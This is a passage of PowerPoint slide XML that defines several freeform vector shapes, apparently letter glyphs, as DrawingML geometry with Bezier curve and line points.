                    <a:pt x="9" y="275"/>
                    <a:pt x="9" y="288"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="309"/>
                    <a:pt x="26" y="329"/>
                    <a:pt x="50" y="329"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="329"/>
                    <a:pt x="122" y="263"/>
                    <a:pt x="124" y="257"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="202"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2" name="Freeform 133">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA438CCC-DB7D-4FE1-B0B4-E2190BC777A0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId29"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3470275" y="1184275"/>
              <a:ext cx="71438" cy="122238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 115 w 188"/>
                <a:gd name="T1" fmla="*/ 111 h 305"/>
                <a:gd name="T2" fmla="*/ 95 w 188"/>
                <a:gd name="T3" fmla="*/ 90 h 305"/>
                <a:gd name="T4" fmla="*/ 25 w 188"/>
                <a:gd name="T5" fmla="*/ 90 h 305"/>
                <a:gd name="T6" fmla="*/ 4 w 188"/>
                <a:gd name="T7" fmla="*/ 105 h 305"/>
                <a:gd name="T8" fmla="*/ 25 w 188"/>
                <a:gd name="T9" fmla="*/ 120 h 305"/>
                <a:gd name="T10" fmla="*/ 81 w 188"/>
                <a:gd name="T11" fmla="*/ 120 h 305"/>
                <a:gd name="T12" fmla="*/ 81 w 188"/>
                <a:gd name="T13" fmla="*/ 275 h 305"/>
                <a:gd name="T14" fmla="*/ 21 w 188"/>
                <a:gd name="T15" fmla="*/ 275 h 305"/>
                <a:gd name="T16" fmla="*/ 0 w 188"/>
                <a:gd name="T17" fmla="*/ 290 h 305"/>
                <a:gd name="T18" fmla="*/ 21 w 188"/>
                <a:gd name="T19" fmla="*/ 305 h 305"/>
                <a:gd name="T20" fmla="*/ 168 w 188"/>
                <a:gd name="T21" fmla="*/ 305 h 305"/>
                <a:gd name="T22" fmla="*/ 188 w 188"/>
                <a:gd name="T23" fmla="*/ 290 h 305"/>
                <a:gd name="T24" fmla="*/ 168 w 188"/>
                <a:gd name="T25" fmla="*/ 275 h 305"/>
                <a:gd name="T26" fmla="*/ 115 w 188"/>
                <a:gd name="T27" fmla="*/ 275 h 305"/>
                <a:gd name="T28" fmla="*/ 115 w 188"/>
                <a:gd name="T29" fmla="*/ 111 h 305"/>
                <a:gd name="T30" fmla="*/ 115 w 188"/>
                <a:gd name="T31" fmla="*/ 25 h 305"/>
                <a:gd name="T32" fmla="*/ 91 w 188"/>
                <a:gd name="T33" fmla="*/ 0 h 305"/>
                <a:gd name="T34" fmla="*/ 66 w 188"/>
                <a:gd name="T35" fmla="*/ 25 h 305"/>
                <a:gd name="T36" fmla="*/ 91 w 188"/>
                <a:gd name="T37" fmla="*/ 50 h 305"/>
                <a:gd name="T38" fmla="*/ 115 w 188"/>
                <a:gd name="T39" fmla="*/ 2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5" y="111"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="95"/>
                    <a:pt x="112" y="90"/>
                    <a:pt x="95" y="90"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="25" y="90"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="90"/>
                    <a:pt x="4" y="90"/>
                    <a:pt x="4" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="120"/>
                    <a:pt x="17" y="120"/>
                    <a:pt x="25" y="120"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="81" y="120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="275"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="275"/>
                    <a:pt x="0" y="275"/>
                    <a:pt x="0" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="305"/>
                    <a:pt x="13" y="305"/>
                    <a:pt x="21" y="305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="168" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="305"/>
                    <a:pt x="188" y="305"/>
                    <a:pt x="188" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="275"/>
                    <a:pt x="175" y="275"/>
                    <a:pt x="168" y="275"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="115" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="115" y="111"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="115" y="25"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="11"/>
                    <a:pt x="104" y="0"/>
                    <a:pt x="91" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="0"/>
                    <a:pt x="66" y="11"/>
                    <a:pt x="66" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="39"/>
                    <a:pt x="77" y="50"/>
                    <a:pt x="91" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="50"/>
                    <a:pt x="115" y="39"/>
                    <a:pt x="115"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3" name="Freeform 134">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B85C9117-D533-4845-9E14-2A673623B67C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId30"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3570287" y="1219200"/>
              <a:ext cx="73025" cy="87313"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 113 w 193"/>
                <a:gd name="T1" fmla="*/ 92 h 222"/>
                <a:gd name="T2" fmla="*/ 79 w 193"/>
                <a:gd name="T3" fmla="*/ 86 h 222"/>
                <a:gd name="T4" fmla="*/ 30 w 193"/>
                <a:gd name="T5" fmla="*/ 58 h 222"/>
                <a:gd name="T6" fmla="*/ 94 w 193"/>
                <a:gd name="T7" fmla="*/ 30 h 222"/>
                <a:gd name="T8" fmla="*/ 143 w 193"/>
                <a:gd name="T9" fmla="*/ 58 h 222"/>
                <a:gd name="T10" fmla="*/ 160 w 193"/>
                <a:gd name="T11" fmla="*/ 75 h 222"/>
                <a:gd name="T12" fmla="*/ 178 w 193"/>
                <a:gd name="T13" fmla="*/ 54 h 222"/>
                <a:gd name="T14" fmla="*/ 178 w 193"/>
                <a:gd name="T15" fmla="*/ 20 h 222"/>
                <a:gd name="T16" fmla="*/ 163 w 193"/>
                <a:gd name="T17" fmla="*/ 0 h 222"/>
                <a:gd name="T18" fmla="*/ 148 w 193"/>
                <a:gd name="T19" fmla="*/ 10 h 222"/>
                <a:gd name="T20" fmla="*/ 95 w 193"/>
                <a:gd name="T21" fmla="*/ 0 h 222"/>
                <a:gd name="T22" fmla="*/ 0 w 193"/>
                <a:gd name="T23" fmla="*/ 58 h 222"/>
                <a:gd name="T24" fmla="*/ 98 w 193"/>
                <a:gd name="T25" fmla="*/ 120 h 222"/>
                <a:gd name="T26" fmla="*/ 162 w 193"/>
                <a:gd name="T27" fmla="*/ 157 h 222"/>
                <a:gd name="T28" fmla="*/ 98 w 193"/>
                <a:gd name="T29" fmla="*/ 192 h 222"/>
                <a:gd name="T30" fmla="*/ 35 w 193"/>
                <a:gd name="T31" fmla="*/ 147 h 222"/>
                <a:gd name="T32" fmla="*/ 17 w 193"/>
                <a:gd name="T33" fmla="*/ 133 h 222"/>
                <a:gd name="T34" fmla="*/ 0 w 193"/>
                <a:gd name="T35" fmla="*/ 153 h 222"/>
                <a:gd name="T36" fmla="*/ 0 w 193"/>
                <a:gd name="T37" fmla="*/ 202 h 222"/>
                <a:gd name="T38" fmla="*/ 15 w 193"/>
                <a:gd name="T39" fmla="*/ 222 h 222"/>
                <a:gd name="T40" fmla="*/ 33 w 193"/>
                <a:gd name="T41" fmla="*/ 203 h 222"/>
                <a:gd name="T42" fmla="*/ 98 w 193"/>
                <a:gd name="T43" fmla="*/ 222 h 222"/>
                <a:gd name="T44" fmla="*/ 193 w 193"/>
                <a:gd name="T45" fmla="*/ 157 h 222"/>
                <a:gd name="T46" fmla="*/ 113 w 193"/>
                <a:gd name="T47" fmla="*/ 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2">
                  <a:moveTo>
                    <a:pt x="113" y="92"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="90"/>
                    <a:pt x="91" y="88"/>
                    <a:pt x="79" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="84"/>
                    <a:pt x="30" y="78"/>
                    <a:pt x="30" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="45"/>
                    <a:pt x="46" y="30"/>
                    <a:pt x="94" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="30"/>
                    <a:pt x="142" y="45"/>
                    <a:pt x="143" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="66"/>
                    <a:pt x="145" y="75"/>
                    <a:pt x="160" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="75"/>
                    <a:pt x="178" y="64"/>
                    <a:pt x="178" y="54"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="178" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="12"/>
                    <a:pt x="178" y="0"/>
                    <a:pt x="163" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="0"/>
                    <a:pt x="149" y="7"/>
                    <a:pt x="148" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="0"/>
                    <a:pt x="104" y="0"/>
                    <a:pt x="95" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="0"/>
                    <a:pt x="0" y="40"/>
                    <a:pt x="0" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="104"/>
                    <a:pt x="52" y="113"/>
                    <a:pt x="98" y="120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="122" y="124"/>
                    <a:pt x="162" y="130"/>
                    <a:pt x="162" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="162" y="175"/>
                    <a:pt x="144" y="192"/>
                    <a:pt x="98" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="192"/>
                    <a:pt x="47" y="186"/>
                    <a:pt x="35" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="138"/>
                    <a:pt x="30" y="133"/>
                    <a:pt x="17" y="133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="133"/>
                    <a:pt x="0" y="143"/>
                    <a:pt x="0" y="153"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="202"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="210"/>
                    <a:pt x="0" y="222"/>
                    <a:pt x="15" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="222"/>
                    <a:pt x="27" y="222"/>
                    <a:pt x="33" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="221"/>
                    <a:pt x="84" y="222"/>
                    <a:pt x="98" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="222"/>
                    <a:pt x="193" y="181"/>
                    <a:pt x="193" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="105"/>
                    <a:pt x="128" y="94"/>
                    <a:pt x="113" y="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4" name="Freeform 135">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEB3D622-7571-4578-B3BB-1A10D554B4DE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId31"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3756025" y="1219200"/>
              <a:ext cx="100013" cy="87313"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 56 w 259"/>
                <a:gd name="T1" fmla="*/ 18 h 218"/>
                <a:gd name="T2" fmla="*/ 37 w 259"/>
                <a:gd name="T3" fmla="*/ 3 h 218"/>
                <a:gd name="T4" fmla="*/ 21 w 259"/>
                <a:gd name="T5" fmla="*/ 3 h 218"/>
                <a:gd name="T6" fmla="*/ 0 w 259"/>
                <a:gd name="T7" fmla="*/ 18 h 218"/>
                <a:gd name="T8" fmla="*/ 29 w 259"/>
                <a:gd name="T9" fmla="*/ 33 h 218"/>
                <a:gd name="T10" fmla="*/ 29 w 259"/>
                <a:gd name="T11" fmla="*/ 188 h 218"/>
                <a:gd name="T12" fmla="*/ 0 w 259"/>
                <a:gd name="T13" fmla="*/ 203 h 218"/>
                <a:gd name="T14" fmla="*/ 21 w 259"/>
                <a:gd name="T15" fmla="*/ 218 h 218"/>
                <a:gd name="T16" fmla="*/ 64 w 259"/>
                <a:gd name="T17" fmla="*/ 218 h 218"/>
                <a:gd name="T18" fmla="*/ 85 w 259"/>
                <a:gd name="T19" fmla="*/ 203 h 218"/>
                <a:gd name="T20" fmla="*/ 56 w 259"/>
                <a:gd name="T21" fmla="*/ 188 h 218"/>
                <a:gd name="T22" fmla="*/ 56 w 259"/>
                <a:gd name="T23" fmla="*/ 98 h 218"/>
                <a:gd name="T24" fmla="*/ 97 w 259"/>
                <a:gd name="T25" fmla="*/ 30 h 218"/>
                <a:gd name="T26" fmla="*/ 116 w 259"/>
                <a:gd name="T27" fmla="*/ 71 h 218"/>
                <a:gd name="T28" fmla="*/ 116 w 259"/>
                <a:gd name="T29" fmla="*/ 188 h 218"/>
                <a:gd name="T30" fmla="*/ 94 w 259"/>
                <a:gd name="T31" fmla="*/ 203 h 218"/>
                <a:gd name="T32" fmla="*/ 114 w 259"/>
                <a:gd name="T33" fmla="*/ 218 h 218"/>
                <a:gd name="T34" fmla="*/ 152 w 259"/>
                <a:gd name="T35" fmla="*/ 218 h 218"/>
                <a:gd name="T36" fmla="*/ 172 w 259"/>
                <a:gd name="T37" fmla="*/ 203 h 218"/>
                <a:gd name="T38" fmla="*/ 144 w 259"/>
                <a:gd name="T39" fmla="*/ 188 h 218"/>
                <a:gd name="T40" fmla="*/ 144 w 259"/>
                <a:gd name="T41" fmla="*/ 98 h 218"/>
                <a:gd name="T42" fmla="*/ 185 w 259"/>
                <a:gd name="T43" fmla="*/ 30 h 218"/>
                <a:gd name="T44" fmla="*/ 203 w 259"/>
                <a:gd name="T45" fmla="*/ 71 h 218"/>
                <a:gd name="T46" fmla="*/ 203 w 259"/>
                <a:gd name="T47" fmla="*/ 188 h 218"/>
                <a:gd name="T48" fmla="*/ 181 w 259"/>
                <a:gd name="T49" fmla="*/ 203 h 218"/>
                <a:gd name="T50" fmla="*/ 202 w 259"/>
                <a:gd name="T51" fmla="*/ 218 h 218"/>
                <a:gd name="T52" fmla="*/ 239 w 259"/>
                <a:gd name="T53" fmla="*/ 218 h 218"/>
                <a:gd name="T54" fmla="*/ 259 w 259"/>
                <a:gd name="T55" fmla="*/ 203 h 218"/>
                <a:gd name="T56" fmla="*/ 231 w 259"/>
                <a:gd name="T57" fmla="*/ 188 h 218"/>
                <a:gd name="T58" fmla="*/ 231 w 259"/>
                <a:gd name="T59" fmla="*/ 67 h 218"/>
                <a:gd name="T60" fmla="*/ 187 w 259"/>
                <a:gd name="T61" fmla="*/ 0 h 218"/>
                <a:gd name="T62" fmla="*/ 137 w 259"/>
                <a:gd name="T63" fmla="*/ 26 h 218"/>
                <a:gd name="T64" fmla="*/ 99 w 259"/>
                <a:gd name="T65" fmla="*/ 0 h 218"/>
                <a:gd name="T66" fmla="*/ 56 w 259"/>
                <a:gd name="T67"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9" h="218">
                  <a:moveTo>
                    <a:pt x="56" y="18"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="3"/>
                    <a:pt x="46" y="3"/>
                    <a:pt x="37" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21" y="3"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="33"/>
                    <a:pt x="11" y="33"/>
                    <a:pt x="29" y="33"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="29" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="188"/>
                    <a:pt x="0" y="188"/>
                    <a:pt x="0" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="218"/>
                    <a:pt x="14" y="218"/>
                    <a:pt x="21" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="218"/>
                    <a:pt x="85" y="218"/>
                    <a:pt x="85" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="188"/>
                    <a:pt x="74" y="188"/>
                    <a:pt x="56" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="56" y="98"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="54"/>
                    <a:pt x="77" y="30"/>
                    <a:pt x="97" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="109" y="30"/>
                    <a:pt x="116" y="39"/>
                    <a:pt x="116" y="71"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="116" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="188"/>
                    <a:pt x="94" y="188"/>
                    <a:pt x="94" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="218"/>
                    <a:pt x="107" y="218"/>
                    <a:pt x="114" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="152" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="218"/>
                    <a:pt x="172" y="218"/>
                    <a:pt x="172" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="188"/>
                    <a:pt x="162" y="188"/>
                    <a:pt x="144" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="144" y="98"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="54"/>
                    <a:pt x="164" y="30"/>
                    <a:pt x="185" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="30"/>
                    <a:pt x="203" y="39"/>
                    <a:pt x="203" y="71"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="203" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="188"/>
                    <a:pt x="181" y="188"/>
                    <a:pt x="181" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="218"/>
                    <a:pt x="195" y="218"/>
                    <a:pt x="202" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="239" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="246" y="218"/>
                    <a:pt x="259" y="218"/>
                    <a:pt x="259" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="259" y="188"/>
                    <a:pt x="249" y="188"/>
                    <a:pt x="231" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="231" y="67"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="231" y="57"/>
                    <a:pt x="231" y="0"/>
                    <a:pt x="187" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="0"/>
                    <a:pt x="151" y="7"/>
                    <a:pt x="137" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="9"/>
                    <a:pt x="116" y="0"/>
                    <a:pt x="99" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="0"/>
                    <a:pt x="68" y="7"/>
                    <a:pt x="56" y="1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5" name="Freeform 136">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E1B3637-2261-498C-8CA5-E6D382F192E8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId32"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3863975" y="1220788"/>
              <a:ext cx="90488" cy="130175"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 201 w 236"/>
                <a:gd name="T1" fmla="*/ 30 h 329"/>
                <a:gd name="T2" fmla="*/ 216 w 236"/>
                <a:gd name="T3" fmla="*/ 30 h 329"/>
                <a:gd name="T4" fmla="*/ 236 w 236"/>
                <a:gd name="T5" fmla="*/ 16 h 329"/>
                <a:gd name="T6" fmla="*/ 216 w 236"/>
                <a:gd name="T7" fmla="*/ 0 h 329"/>
                <a:gd name="T8" fmla="*/ 158 w 236"/>
                <a:gd name="T9" fmla="*/ 0 h 329"/>
                <a:gd name="T10" fmla="*/ 138 w 236"/>
                <a:gd name="T11" fmla="*/ 15 h 329"/>
                <a:gd name="T12" fmla="*/ 158 w 236"/>
                <a:gd name="T13" fmla="*/ 30 h 329"/>
                <a:gd name="T14" fmla="*/ 172 w 236"/>
                <a:gd name="T15" fmla="*/ 30 h 329"/>
                <a:gd name="T16" fmla="*/ 136 w 236"/>
                <a:gd name="T17" fmla="*/ 137 h 329"/>
                <a:gd name="T18" fmla="*/ 123 w 236"/>
                <a:gd name="T19" fmla="*/ 180 h 329"/>
                <a:gd name="T20" fmla="*/ 122 w 236"/>
                <a:gd name="T21" fmla="*/ 180 h 329"/>
                <a:gd name="T22" fmla="*/ 112 w 236"/>
                <a:gd name="T23" fmla="*/ 150 h 329"/>
                <a:gd name="T24" fmla="*/ 65 w 236"/>
                <a:gd name="T25" fmla="*/ 30 h 329"/>
                <a:gd name="T26" fmla="*/ 78 w 236"/>
                <a:gd name="T27" fmla="*/ 30 h 329"/>
                <a:gd name="T28" fmla="*/ 98 w 236"/>
                <a:gd name="T29" fmla="*/ 16 h 329"/>
                <a:gd name="T30" fmla="*/ 78 w 236"/>
                <a:gd name="T31" fmla="*/ 0 h 329"/>
                <a:gd name="T32" fmla="*/ 20 w 236"/>
                <a:gd name="T33" fmla="*/ 0 h 329"/>
                <a:gd name="T34" fmla="*/ 0 w 236"/>
                <a:gd name="T35" fmla="*/ 16 h 329"/>
                <a:gd name="T36" fmla="*/ 20 w 236"/>
                <a:gd name="T37" fmla="*/ 30 h 329"/>
                <a:gd name="T38" fmla="*/ 35 w 236"/>
                <a:gd name="T39" fmla="*/ 30 h 329"/>
                <a:gd name="T40" fmla="*/ 106 w 236"/>
                <a:gd name="T41" fmla="*/ 209 h 329"/>
                <a:gd name="T42" fmla="*/ 108 w 236"/>
                <a:gd name="T43" fmla="*/ 215 h 329"/>
                <a:gd name="T44" fmla="*/ 89 w 236"/>
                <a:gd name="T45" fmla="*/ 269 h 329"/>
                <a:gd name="T46" fmla="*/ 49 w 236"/>
                <a:gd name="T47" fmla="*/ 298 h 329"/>
                <a:gd name="T48" fmla="*/ 51 w 236"/>
                <a:gd name="T49" fmla="*/ 287 h 329"/>
                <a:gd name="T50" fmla="*/ 30 w 236"/>
                <a:gd name="T51" fmla="*/ 266 h 329"/>
                <a:gd name="T52" fmla="*/ 8 w 236"/>
                <a:gd name="T53" fmla="*/ 288 h 329"/>
                <a:gd name="T54" fmla="*/ 49 w 236"/>
                <a:gd name="T55" fmla="*/ 329 h 329"/>
                <a:gd name="T56" fmla="*/ 124 w 236"/>
                <a:gd name="T57" fmla="*/ 257 h 329"/>
                <a:gd name="T58" fmla="*/ 201 w 236"/>
                <a:gd name="T59" fmla="*/ 3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6" h="329">
                  <a:moveTo>
                    <a:pt x="201" y="30"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="216" y="30"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="224" y="30"/>
                    <a:pt x="236" y="30"/>
                    <a:pt x="236" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="236" y="0"/>
                    <a:pt x="224" y="0"/>
                    <a:pt x="216" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="158" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="0"/>
                    <a:pt x="138" y="0"/>
                    <a:pt x="138" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="30"/>
                    <a:pt x="150" y="30"/>
                    <a:pt x="158" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="172" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136" y="137"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="155"/>
                    <a:pt x="126" y="164"/>
                    <a:pt x="123" y="180"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="122" y="180"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="170"/>
                    <a:pt x="115" y="160"/>
                    <a:pt x="112" y="150"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="65" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78" y="30"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="30"/>
                    <a:pt x="98" y="30"/>
                    <a:pt x="98" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="0"/>
                    <a:pt x="86" y="0"/>
                    <a:pt x="78" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="30"/>
                    <a:pt x="12" y="30"/>
                    <a:pt x="20" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="35" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106" y="209"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="214"/>
                    <a:pt x="108" y="215"/>
                    <a:pt x="108" y="215"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="216"/>
                    <a:pt x="95" y="257"/>
                    <a:pt x="89" y="269"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="297"/>
                    <a:pt x="56" y="298"/>
                    <a:pt x="49" y="298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="298"/>
                    <a:pt x="51" y="294"/>
                    <a:pt x="51" y="287"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="275"/>
                    <a:pt x="42" y="266"/>
                    <a:pt x="30" y="266"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="266"/>
                    <a:pt x="8" y="275"/>
                    <a:pt x="8" y="288"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="309"/>
                    <a:pt x="25" y="329"/>
                    <a:pt x="49" y="329"/>
                  </a:cubicBezTo>
